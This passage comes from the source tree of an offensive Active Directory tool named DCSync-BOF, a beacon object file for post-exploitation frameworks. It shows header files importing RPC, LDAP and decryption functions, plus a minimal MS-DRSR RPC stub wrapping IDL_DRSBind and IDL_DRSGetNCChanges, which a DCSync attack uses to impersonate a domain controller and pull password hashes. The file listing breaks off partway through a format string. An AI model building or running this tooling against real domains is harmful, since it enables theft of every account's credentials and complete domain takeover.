DECLSPEC_IMPORT RPC_STATUS RPC_ENTRY RPCRT4$RpcBindingFromStringBindingA(
    unsigned char* StringBinding,
    RPC_BINDING_HANDLE* Binding);

DECLSPEC_IMPORT RPC_STATUS RPC_ENTRY RPCRT4$RpcStringFreeA(unsigned char** String);
DECLSPEC_IMPORT RPC_STATUS RPC_ENTRY RPCRT4$RpcBindingFree(RPC_BINDING_HANDLE* Binding);

DECLSPEC_IMPORT RPC_STATUS RPC_ENTRY RPCRT4$RpcBindingSetAuthInfoA(
    RPC_BINDING_HANDLE Binding,
    unsigned char* ServerPrincName,
    unsigned long AuthnLevel,
    unsigned long AuthnSvc,
    void* AuthIdentity,
    unsigned long AuthzSvc);

DECLSPEC_IMPORT RPC_STATUS RPC_ENTRY RPCRT4$RpcBindingSetOption(
    RPC_BINDING_HANDLE hBinding,
    unsigned long option,
    ULONG_PTR optionValue);

DECLSPEC_IMPORT RPC_STATUS RPC_ENTRY RPCRT4$I_RpcBindingInqSecurityContext(
    RPC_BINDING_HANDLE Binding,
    void** SecurityContextHandle);

DECLSPEC_IMPORT RPC_STATUS RPC_ENTRY RPCRT4$UuidCreate(UUID* Uuid);

DECLSPEC_IMPORT CLIENT_CALL_RETURN RPC_VAR_ENTRY RPCRT4$NdrClientCall2(
    void* pStubDescriptor,
    void* pFormat,
    ...);

// Crypto Functions
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptAcquireContextA(
    HCRYPTPROV* phProv,
    LPCSTR szContainer,
    LPCSTR szProvider,
    DWORD dwProvType,
    DWORD dwFlags);

DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptReleaseContext(
    HCRYPTPROV hProv,
    DWORD dwFlags);

DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptCreateHash(
    HCRYPTPROV hProv,
    ALG_ID Algid,
    HCRYPTKEY hKey,
    DWORD dwFlags,
    HCRYPTHASH* phHash);

DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptHashData(
    HCRYPTHASH hHash,
    const BYTE* pbData,
    DWORD dwDataLen,
    DWORD dwFlags);

DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptDeriveKey(
    HCRYPTPROV hProv,
    ALG_ID Algid,
    HCRYPTHASH hBaseData,
    DWORD dwFlags,
    HCRYPTKEY* phKey);

DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptDecrypt(
    HCRYPTKEY hKey,
    HCRYPTHASH hHash,
    BOOL Final,
    DWORD dwFlags,
    BYTE* pbData,
    DWORD* pdwDataLen);

DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptImportKey(
    HCRYPTPROV hProv,
    const BYTE* pbData,
    DWORD dwDataLen,
    HCRYPTKEY hPubKey,
    DWORD dwFlags,
    HCRYPTKEY* phKey);

DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptGetHashParam(
    HCRYPTHASH hHash,
    DWORD dwParam,
    BYTE* pbData,
    DWORD* pdwDataLen,
    DWORD dwFlags);

DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptDestroyKey(HCRYPTKEY hKey);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptDestroyHash(HCRYPTHASH hHash);

DECLSPEC_IMPORT NTSTATUS WINAPI ADVAPI32$SystemFunction025(
    const BYTE* EncryptedData,
    const DWORD* Key,
    BYTE* DecryptedData);

DECLSPEC_IMPORT SECURITY_STATUS WINAPI SECUR32$QueryContextAttributesA(
    PCtxtHandle phContext,
    unsigned long ulAttribute,
    void* pBuffer);

DECLSPEC_IMPORT SECURITY_STATUS WINAPI SECUR32$FreeContextBuffer(
    void* pvContextBuffer);

// ============================================================================
// Global Variables (External)
// ============================================================================

#endif // DCSYNC_H


================================================
FILE: AD-BOF/DCSync-BOF/_include/ldap_common.h
================================================
#ifndef LDAP_COMMON_H
#define LDAP_COMMON_H

#include <windows.h>

// LDAP structures and constants
typedef struct ldap {
    struct {
        UINT_PTR sb_sd;
        UCHAR Reserved1[(10*sizeof(ULONG))+1];
        ULONG_PTR sb_naddr;
        UCHAR Reserved2[(6*sizeof(ULONG))];
    } ld_sb;
    char *ld_host;
    ULONG ld_version;
    UCHAR ld_lberoptions;
    ULONG ld_deref;
    ULONG ld_timelimit;
    ULONG ld_sizelimit;
    ULONG ld_errno;
    char *ld_matched;
    char *ld_error;
    ULONG ld_msgid;
    UCHAR Reserved3[(6*sizeof(ULONG))+1];
    ULONG ld_cldaptries;
    ULONG ld_cldaptimeout;
    ULONG ld_refhoplimit;
    ULONG ld_options;
} LDAP, *PLDAP;

typedef struct berval {
    ULONG bv_len;
    char *bv_val;
} LDAP_BERVAL, *PLDAP_BERVAL, BERVAL, *PBERVAL, BerValue;

typedef struct berelement {
  char *opaque;
} BerElement;

typedef struct ldapmodA {
    ULONG mod_op;
    char *mod_type;
    union {
        char **modv_strvals;
        struct berval **modv_bvals;
    } mod_vals;
} LDAPModA, *PLDAPModA;

typedef struct ldapcontrolA {
    char *ldctl_oid;
    struct berval ldctl_value;
    BOOLEAN ldctl_iscritical;
} LDAPControlA, *PLDAPControlA;

typedef struct ldapmsg {
    ULONG lm_msgid;
    ULONG lm_msgtype;
    PVOID lm_ber;
    struct ldapmsg* lm_chain;
    struct ldapmsg* lm_next;
    ULONG lm_time;
    LDAP* Connection;
    PVOID Request;
    ULONG lm_returncode;
    USHORT lm_referral;
    BOOLEAN lm_chased;
    BOOLEAN lm_eom;
    BOOLEAN ConnectionReferenced;
} LDAPMessage, *PLDAPMessage;

// LDAP Constants
#define LDAP_PORT 389
#define LDAP_SSL_PORT 636
#define LDAP_VERSION3 3

// LDAP SSL Options
#define LDAP_OPT_SSL 0x0a
#define LDAP_OPT_SSL_OFF 0
#define LDAP_OPT_SSL_ON 1

// LDAP Operation Constants
#define LDAP_MOD_ADD 0x00
#define LDAP_MOD_DELETE 0x01
#define LDAP_MOD_REPLACE 0x02
#define LDAP_MOD_BVALUES 0x80

// LDAP Return Codes
#define LDAP_SUCCESS 0x00
#define LDAP_OPERATIONS_ERROR 0x01
#define LDAP_PROTOCOL_ERROR 0x02
#define LDAP_TIMELIMIT_EXCEEDED 0x03
#define LDAP_ALREADY_EXISTS 0x44
#define LDAP_INSUFFICIENT_RIGHTS 0x32
#define LDAP_INVALID_DN_SYNTAX 0x22
#define LDAP_NO_SUCH_OBJECT 0x20
#define LDAP_SERVER_DOWN 0x51
#define LDAP_INVALID_CREDENTIALS 0x31
#define LDAP_NO_SUCH_ATTRIBUTE 0x10
#define LDAP_CONSTRAINT_VIOLATION 0x13
#define LDAP_TYPE_OR_VALUE_EXISTS 0x14
#define LDAP_ATTRIBUTE_OR_VALUE_EXISTS	LDAP_TYPE_OR_VALUE_EXISTS
#define LDAP_UNWILLING_TO_PERFORM 0x35
#define LDAP_OBJECT_CLASS_VIOLATION 0x41

// LDAP Options
#define LDAP_OPT_PROTOCOL_VERSION 0x11
#define LDAP_OPT_VERSION 0x11
#define LDAP_OPT_SERVER_CERTIFICATE 0x81
#define LDAP_OPT_SIGN 0x95
#define LDAP_OPT_ENCRYPT 0x96

// LDAP SSL Certificate Verification
#define LDAP_OPT_ON ((void*)1)
#define LDAP_OPT_OFF ((void*)0)

// Certificate callback type
typedef BOOLEAN (*VERIFYSERVERCERT)(PLDAP Connection, PCCERT_CONTEXT pServerCert);

// Authentication methods
#define LDAP_AUTH_NEGOTIATE 0x0486

// LDAP search scope values
#define LDAP_SCOPE_BASE 0x00
#define LDAP_SCOPE_ONELEVEL 0x01
#define LDAP_SCOPE_SUBTREE 0x02

// User Account Control (UAC) flags
// Reference: https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
#define UF_SCRIPT                           0x00000001  // Logon script executed
#define UF_ACCOUNTDISABLE                   0x00000002  // Account disabled
#define UF_HOMEDIR_REQUIRED                 0x00000008  // Home directory required
#define UF_LOCKOUT                          0x00000010  // Account locked out
#define UF_PASSWD_NOTREQD                   0x00000020  // No password required
#define UF_PASSWD_CANT_CHANGE               0x00000040  // User cannot change password
#define UF_ENCRYPTED_TEXT_PWD_ALLOWED       0x00000080  // Store password using reversible encryption
#define UF_TEMP_DUPLICATE_ACCOUNT           0x00000100  // Local user account
#define UF_NORMAL_ACCOUNT                   0x00000200  // Default account type (user)
#define UF_INTERDOMAIN_TRUST_ACCOUNT        0x00000800  // Interdomain trust account
#define UF_WORKSTATION_TRUST_ACCOUNT        0x00001000  // Workstation trust account (computer)
#define UF_SERVER_TRUST_ACCOUNT             0x00002000  // Domain controller account
#define UF_DONT_EXPIRE_PASSWD               0x00010000  // Password never expires
#define UF_MNS_LOGON_ACCOUNT                0x00020000  // MNS logon account
#define UF_SMARTCARD_REQUIRED               0x00040000  // Smart card required for interactive logon
#define UF_TRUSTED_FOR_DELEGATION           0x00080000  // Account trusted for Kerberos delegation
#define UF_NOT_DELEGATED                    0x00100000  // Account cannot be delegated
#define UF_USE_DES_KEY_ONLY                 0x00200000  // Restrict to DES encryption types
#define UF_DONT_REQ_PREAUTH                 0x00400000  // Kerberos pre-authentication not required (AS-REP roasting!)
#define UF_PASSWORD_EXPIRED                 0x00800000  // Password expired
#define UF_TRUSTED_TO_AUTH_FOR_DELEGATION   0x01000000  // Account enabled for delegation (constrained delegation)
#define UF_NO_AUTH_DATA_REQUIRED            0x02000000  // Account does not require Kerberos PAC
#define UF_PARTIAL_SECRETS_ACCOUNT          0x04000000  // RODC partial secrets account

// Account type flags (should never be cleared)
#define UF_ACCOUNT_TYPE_MASK (UF_NORMAL_ACCOUNT | UF_WORKSTATION_TRUST_ACCOUNT | UF_SERVER_TRUST_ACCOUNT | UF_INTERDOMAIN_TRUST_ACCOUNT)

// NETAPI32 imports for DC discovery
typedef struct _DOMAIN_CONTROLLER_INFOA {
    LPSTR DomainControllerName;
    LPSTR DomainControllerAddress;
    ULONG DomainControllerAddressType;
    GUID DomainGuid;
    LPSTR DomainName;
    LPSTR DnsForestName;
    ULONG Flags;
    LPSTR DcSiteName;
    LPSTR ClientSiteName;
} DOMAIN_CONTROLLER_INFOA, *PDOMAIN_CONTROLLER_INFOA;

DECLSPEC_IMPORT DWORD WINAPI NETAPI32$DsGetDcNameA(
    LPCSTR ComputerName,
    LPCSTR DomainName,
    GUID *DomainGuid,
    LPCSTR SiteName,
    ULONG Flags,
    PDOMAIN_CONTROLLER_INFOA *DomainControllerInfo
);

DECLSPEC_IMPORT DWORD WINAPI NETAPI32$NetApiBufferFree(LPVOID Buffer);

// LDAP API function imports - ANSI versions (use char* to avoid PCHAR conflicts)
DECLSPEC_IMPORT LDAP* WLDAP32$ldap_init(char* HostName, ULONG PortNumber);
DECLSPEC_IMPORT ULONG WLDAP32$ldap_set_option(LDAP* ld, int option, const void* invalue);
DECLSPEC_IMPORT ULONG WLDAP32$ldap_get_option(LDAP* ld, int option, void* outvalue);
DECLSPEC_IMPORT ULONG WLDAP32$ldap_bind_s(LDAP* ld, const char* dn, const char* cred, ULONG method);
DECLSPEC_IMPORT ULONG WLDAP32$ldap_unbind_s(LDAP* ld);
DECLSPEC_IMPORT ULONG WLDAP32$ldap_add_s(LDAP* ld, const char* dn, LDAPModA** attrs);
DECLSPEC_IMPORT ULONG WLDAP32$ldap_modify_s(LDAP* ld, const char* dn, LDAPModA** mods);
DECLSPEC_IMPORT ULONG WLDAP32$ldap_count_values(char** vals);
DECLSPEC_IMPORT ULONG WLDAP32$ldap_delete_s(LDAP* ld, const char* dn);
DECLSPEC_IMPORT ULONG WLDAP32$ldap_search_s(LDAP* ld, const char* base, ULONG scope, const char* filter, char** attrs, ULONG attrsonly, LDAPMessage** res);
DECLSPEC_IMPORT LDAPMessage* WLDAP32$ldap_first_entry(LDAP* ld, LDAPMessage* res);
DECLSPEC_IMPORT LDAPMessage* WLDAP32$ldap_next_entry(LDAP* ld, LDAPMessage* entry);
DECLSPEC_IMPORT char** WLDAP32$ldap_get_values(LDAP* ld, LDAPMessage* entry, const char* attr);
DECLSPEC_IMPORT ULONG WLDAP32$ldap_value_free(char** vals);
DECLSPEC_IMPORT ULONG WLDAP32$ldap_msgfree(LDAPMessage* res);
DECLSPEC_IMPORT char* WLDAP32$ldap_first_attribute(LDAP* ld, LDAPMessage* entry, BerElement** ber);
DECLSPEC_IMPORT char* WLDAP32$ldap_next_attribute(LDAP* ld, LDAPMessage* entry, BerElement* ber);
DECLSPEC_IMPORT void WLDAP32$ldap_memfree(char* block);
DECLSPEC_IMPORT void WLDAP32$ber_free(BerElement* ber, int freebuf);
DECLSPEC_IMPORT ULONG WLDAP32$ldap_count_entries(LDAP* ld, LDAPMessage* res);
DECLSPEC_IMPORT char* WLDAP32$ldap_err2stringA(ULONG err);
DECLSPEC_IMPORT struct berval** WLDAP32$ldap_get_values_len(LDAP* ld, LDAPMessage* entry, const char* attr);
DECLSPEC_IMPORT ULONG WLDAP32$ldap_value_free_len(struct berval** vals);

// Structure to hold user information from LDAP query
typedef struct _USER_LDAP_INFO {
    char* distinguishedName;
    char* samAccountName;
    GUID objectGuid;
} USER_LDAP_INFO;

// Structure to hold domain controller context information
typedef struct _DC_CONTEXT {
    char* defaultNamingContext;
    GUID dcObjectGuid;
} DC_CONTEXT;

// Shared function declarations
LDAP* InitializeLDAPConnection(const char* dcAddress, BOOL useLdaps, char** outDcHostname);
DC_CONTEXT* GetDCContext(LDAP* ld, const char* dcHostname);
void FreeDCContext(DC_CONTEXT* context);
char* GetDefaultNamingContext(LDAP* ld, const char* dcHostname);
USER_LDAP_INFO* GetUserInfo(LDAP* ld, const char* identifier, const char* searchBase, BOOL isDN);
void FreeUserInfo(USER_LDAP_INFO* userInfo);
void CleanupLDAP(LDAP* ld);

// Helper string conversion functions
wchar_t* CharToWChar(const char* str);

#endif // LDAP_COMMON_H

================================================
FILE: AD-BOF/DCSync-BOF/drsuapi/ms-drsr-custom.c
================================================
/*
 * Minimal RPC stub for DCSync  
 * Format strings extracted from ms-drsr_c.c (full MIDL-generated stub)
 * 
 * Key offsets:
 *   IDL_DRSBind: 0
 *   IDL_DRSUnbind: 60  
 *   IDL_DRSReplicaSync: 104
 *   IDL_DRSGetNCChanges: 160
 */

#include <windows.h>
#include "ms-drsr.h"

// BOF compatibility
#define NdrClientCall2 RPCRT4$NdrClientCall2

DECLSPEC_IMPORT CLIENT_CALL_RETURN RPC_VAR_ENTRY RPCRT4$NdrClientCall2(
    PMIDL_STUB_DESC pStubDescriptor,
    PFORMAT_STRING pFormat,
    ...);

extern void* __RPC_USER MIDL_user_allocate(size_t);
extern void __RPC_USER MIDL_user_free(void*);

// Format string structures
typedef struct _ms2Ddrsr_MIDL_TYPE_FORMAT_STRING {
    short Pad;
    unsigned char Format[7867];
} ms2Ddrsr_MIDL_TYPE_FORMAT_STRING;

typedef struct _ms2Ddrsr_MIDL_PROC_FORMAT_STRING {
    short Pad;
    unsigned char Format[2113];
} ms2Ddrsr_MIDL_PROC_FORMAT_STRING;

// Forward declarations
static const ms2Ddrsr_MIDL_TYPE_FORMAT_STRING ms2Ddrsr__MIDL_TypeFormatString;
const ms2Ddrsr_MIDL_PROC_FORMAT_STRING ms2Ddrsr__MIDL_ProcFormatString;
static RPC_BINDING_HANDLE drsuapi__MIDL_AutoBindHandle;

// RPC Client Interface (drsuapi UUID)
static const RPC_CLIENT_INTERFACE drsuapi___RpcClientInterface = {
    sizeof(RPC_CLIENT_INTERFACE),
    {{0xe3514235,0x4b06,0x11d1,{0xab,0x04,0x00,0xc0,0x4f,0xc2,0xdc,0xd2}},{4,0}},
    {{0x8a885d04,0x1ceb,0x11c9,{0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60}},{2,0}},
    0, 0, 0, 0, 0, 0
};

// Stub descriptor  
static const MIDL_STUB_DESC drsuapi_StubDesc = {
    (void*)&drsuapi___RpcClientInterface,
    MIDL_user_allocate,
    MIDL_user_free,
    &drsuapi__MIDL_AutoBindHandle,
    0, 0, 0, 0,
    ms2Ddrsr__MIDL_TypeFormatString.Format,
    1, 0x60000, 0, 0x8000253, 0, 0, 0, 0x1, 0, 0, 0
};

// Minimal wrapper functions
ULONG IDL_DRSBind(
    handle_t rpc_handle,
    UUID *puuidClientDsa,
    DRS_EXTENSIONS *pextClient,
    DRS_EXTENSIONS **ppextServer,
    DRS_HANDLE *phDrs)
{
    return (ULONG)NdrClientCall2(
        (PMIDL_STUB_DESC)&drsuapi_StubDesc,
        (PFORMAT_STRING)&ms2Ddrsr__MIDL_ProcFormatString.Format[0],
        rpc_handle, puuidClientDsa, pextClient, ppextServer, phDrs
    ).Simple;
}

ULONG IDL_DRSUnbind(DRS_HANDLE *phDrs)
{
    return (ULONG)NdrClientCall2(
        (PMIDL_STUB_DESC)&drsuapi_StubDesc,
        (PFORMAT_STRING)&ms2Ddrsr__MIDL_ProcFormatString.Format[60],
        phDrs
    ).Simple;
}

ULONG IDL_DRSReplicaSync(
    DRS_HANDLE hDrs,
    DWORD dwVersion,
    DRS_MSG_REPSYNC *pmsgSync)
{
    return (ULONG)NdrClientCall2(
        (PMIDL_STUB_DESC)&drsuapi_StubDesc,
        (PFORMAT_STRING)&ms2Ddrsr__MIDL_ProcFormatString.Format[104],
        hDrs, dwVersion, pmsgSync
    ).Simple;
}

ULONG IDL_DRSGetNCChanges(
    DRS_HANDLE hDrs,
    DWORD dwInVersion,
    DRS_MSG_GETCHGREQ *pmsgIn,
    DWORD *pdwOutVersion,
    DRS_MSG_GETCHGREPLY *pmsgOut)
{
    return (ULONG)NdrClientCall2(
        (PMIDL_STUB_DESC)&drsuapi_StubDesc,
        (PFORMAT_STRING)&ms2Ddrsr__MIDL_ProcFormatString.Format[160],
        hDrs, dwInVersion, pmsgIn, pdwOutVersion, pmsgOut
    ).Simple;
}

// PROC Format String (extracted from ms-drsr_c.c)
const ms2Ddrsr_MIDL_PROC_FORMAT_STRING ms2Ddrsr__MIDL_ProcFormatString =
    {
        0,
        {
	/* Procedure IDL_DRSBind */

			0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/*  2 */	NdrFcLong( 0x0 ),	/* 0 */
/*  6 */	NdrFcShort( 0x0 ),	/* 0 */
/*  8 */	NdrFcShort( 0x30 ),	/* x86 Stack size/offset = 48 */
/* 10 */	0x32,		/* FC_BIND_PRIMITIVE */
			0x0,		/* 0 */
/* 12 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 14 */	NdrFcShort( 0x44 ),	/* 68 */
/* 16 */	NdrFcShort( 0x40 ),	/* 64 */
/* 18 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
			0x5,		/* 5 */
/* 20 */	0xa,		/* 10 */
			0x47,		/* Ext Flags:  new corr desc, clt corr check, srv corr check, has range on conformance */
/* 22 */	NdrFcShort( 0x1 ),	/* 1 */
/* 24 */	NdrFcShort( 0x1 ),	/* 1 */
/* 26 */	NdrFcShort( 0x0 ),	/* 0 */
/* 28 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Parameter puuidClientDsa */

/* 30 */	NdrFcShort( 0xa ),	/* Flags:  must free, in, */
/* 32 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 34 */	NdrFcShort( 0x2 ),	/* Type Offset=2 */

	/* Parameter pextClient */

/* 36 */	NdrFcShort( 0xb ),	/* Flags:  must size, must free, in, */
/* 38 */	NdrFcShort( 0x10 ),	/* x86 Stack size/offset = 16 */
/* 40 */	NdrFcShort( 0x18 ),	/* Type Offset=24 */

	/* Parameter ppextServer */

/* 42 */	NdrFcShort( 0x2013 ),	/* Flags:  must size, must free, out, srv alloc size=8 */
/* 44 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 46 */	NdrFcShort( 0x3a ),	/* Type Offset=58 */

	/* Parameter phDrs */

/* 48 */	NdrFcShort( 0x110 ),	/* Flags:  out, simple ref, */
/* 50 */	NdrFcShort( 0x20 ),	/* x86 Stack size/offset = 32 */
/* 52 */	NdrFcShort( 0x42 ),	/* Type Offset=66 */

	/* Return value */

/* 54 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
/* 56 */	NdrFcShort( 0x28 ),	/* x86 Stack size/offset = 40 */
/* 58 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Procedure IDL_DRSUnbind */

/* 60 */	0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/* 62 */	NdrFcLong( 0x0 ),	/* 0 */
/* 66 */	NdrFcShort( 0x1 ),	/* 1 */
/* 68 */	NdrFcShort( 0x10 ),	/* x86 Stack size/offset = 16 */
/* 70 */	0x30,		/* FC_BIND_CONTEXT */
			0xe0,		/* Ctxt flags:  via ptr, in, out, */
/* 72 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 74 */	0x0,		/* 0 */
			0x0,		/* 0 */
/* 76 */	NdrFcShort( 0x38 ),	/* 56 */
/* 78 */	NdrFcShort( 0x40 ),	/* 64 */
/* 80 */	0x44,		/* Oi2 Flags:  has return, has ext, */
			0x2,		/* 2 */
/* 82 */	0xa,		/* 10 */
			0x41,		/* Ext Flags:  new corr desc, has range on conformance */
/* 84 */	NdrFcShort( 0x0 ),	/* 0 */
/* 86 */	NdrFcShort( 0x0 ),	/* 0 */
/* 88 */	NdrFcShort( 0x0 ),	/* 0 */
/* 90 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Parameter phDrs */

/* 92 */	NdrFcShort( 0x118 ),	/* Flags:  in, out, simple ref, */
/* 94 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 96 */	NdrFcShort( 0x4a ),	/* Type Offset=74 */

	/* Return value */

/* 98 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
/* 100 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 102 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Procedure IDL_DRSReplicaSync */

/* 104 */	0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/* 106 */	NdrFcLong( 0x0 ),	/* 0 */
/* 110 */	NdrFcShort( 0x2 ),	/* 2 */
/* 112 */	NdrFcShort( 0x20 ),	/* x86 Stack size/offset = 32 */
/* 114 */	0x30,		/* FC_BIND_CONTEXT */
			0x40,		/* Ctxt flags:  in, */
/* 116 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 118 */	0x0,		/* 0 */
			0x0,		/* 0 */
/* 120 */	NdrFcShort( 0x2c ),	/* 44 */
/* 122 */	NdrFcShort( 0x8 ),	/* 8 */
/* 124 */	0x46,		/* Oi2 Flags:  clt must size, has return, has ext, */
			0x4,		/* 4 */
/* 126 */	0xa,		/* 10 */
			0x45,		/* Ext Flags:  new corr desc, srv corr check, has range on conformance */
/* 128 */	NdrFcShort( 0x0 ),	/* 0 */
/* 130 */	NdrFcShort( 0x1 ),	/* 1 */
/* 132 */	NdrFcShort( 0x0 ),	/* 0 */
/* 134 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Parameter hDrs */

/* 136 */	NdrFcShort( 0x8 ),	/* Flags:  in, */
/* 138 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 140 */	NdrFcShort( 0x4e ),	/* Type Offset=78 */

	/* Parameter dwVersion */

/* 142 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
/* 144 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 146 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgSync */

/* 148 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
/* 150 */	NdrFcShort( 0x10 ),	/* x86 Stack size/offset = 16 */
/* 152 */	NdrFcShort( 0x56 ),	/* Type Offset=86 */

	/* Return value */

/* 154 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
/* 156 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 158 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Procedure IDL_DRSGetNCChanges */

/* 160 */	0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/* 162 */	NdrFcLong( 0x0 ),	/* 0 */
/* 166 */	NdrFcShort( 0x3 ),	/* 3 */
/* 168 */	NdrFcShort( 0x30 ),	/* x86 Stack size/offset = 48 */
/* 170 */	0x30,		/* FC_BIND_CONTEXT */
			0x40,		/* Ctxt flags:  in, */
/* 172 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 174 */	0x0,		/* 0 */
			0x0,		/* 0 */
/* 176 */	NdrFcShort( 0x2c ),	/* 44 */
/* 178 */	NdrFcShort( 0x24 ),	/* 36 */
/* 180 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
			0x6,		/* 6 */
/* 182 */	0xa,		/* 10 */
			0x47,		/* Ext Flags:  new corr desc, clt corr check, srv corr check, has range on conformance */
/* 184 */	NdrFcShort( 0x1 ),	/* 1 */
/* 186 */	NdrFcShort( 0x1 ),	/* 1 */
/* 188 */	NdrFcShort( 0x0 ),	/* 0 */
/* 190 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Parameter hDrs */

/* 192 */	NdrFcShort( 0x8 ),	/* Flags:  in, */
/* 194 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 196 */	NdrFcShort( 0x4e ),	/* Type Offset=78 */

	/* Parameter dwInVersion */

/* 198 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
/* 200 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 202 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgIn */

/* 204 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
/* 206 */	NdrFcShort( 0x10 ),	/* x86 Stack size/offset = 16 */
/* 208 */	NdrFcShort( 0x114 ),	/* Type Offset=276 */

	/* Parameter pdwOutVersion */

/* 210 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
/* 212 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 214 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgOut */

/* 216 */	NdrFcShort( 0x113 ),	/* Flags:  must size, must free, out, simple ref, */
/* 218 */	NdrFcShort( 0x20 ),	/* x86 Stack size/offset = 32 */
/* 220 */	NdrFcShort( 0x382 ),	/* Type Offset=898 */

	/* Return value */

/* 222 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
/* 224 */	NdrFcShort( 0x28 ),	/* x86 Stack size/offset = 40 */
/* 226 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Procedure IDL_DRSUpdateRefs */

/* 228 */	0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/* 230 */	NdrFcLong( 0x0 ),	/* 0 */
/* 234 */	NdrFcShort( 0x4 ),	/* 4 */
/* 236 */	NdrFcShort( 0x20 ),	/* x86 Stack size/offset = 32 */
/* 238 */	0x30,		/* FC_BIND_CONTEXT */
			0x40,		/* Ctxt flags:  in, */
/* 240 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 242 */	0x0,		/* 0 */
			0x0,		/* 0 */
/* 244 */	NdrFcShort( 0x2c ),	/* 44 */
/* 246 */	NdrFcShort( 0x8 ),	/* 8 */
/* 248 */	0x46,		/* Oi2 Flags:  clt must size, has return, has ext, */
			0x4,		/* 4 */
/* 250 */	0xa,		/* 10 */
			0x45,		/* Ext Flags:  new corr desc, srv corr check, has range on conformance */
/* 252 */	NdrFcShort( 0x0 ),	/* 0 */
/* 254 */	NdrFcShort( 0x1 ),	/* 1 */
/* 256 */	NdrFcShort( 0x0 ),	/* 0 */
/* 258 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Parameter hDrs */

/* 260 */	NdrFcShort( 0x8 ),	/* Flags:  in, */
/* 262 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 264 */	NdrFcShort( 0x4e ),	/* Type Offset=78 */

	/* Parameter dwVersion */

/* 266 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
/* 268 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 270 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgUpdRefs */

/* 272 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
/* 274 */	NdrFcShort( 0x10 ),	/* x86 Stack size/offset = 16 */
/* 276 */	NdrFcShort( 0x6ac ),	/* Type Offset=1708 */

	/* Return value */

/* 278 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
/* 280 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 282 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Procedure IDL_DRSReplicaAdd */

/* 284 */	0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/* 286 */	NdrFcLong( 0x0 ),	/* 0 */
/* 290 */	NdrFcShort( 0x5 ),	/* 5 */
/* 292 */	NdrFcShort( 0x20 ),	/* x86 Stack size/offset = 32 */
/* 294 */	0x30,		/* FC_BIND_CONTEXT */
			0x40,		/* Ctxt flags:  in, */
/* 296 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 298 */	0x0,		/* 0 */
			0x0,		/* 0 */
/* 300 */	NdrFcShort( 0x2c ),	/* 44 */
/* 302 */	NdrFcShort( 0x8 ),	/* 8 */
/* 304 */	0x46,		/* Oi2 Flags:  clt must size, has return, has ext, */
			0x4,		/* 4 */
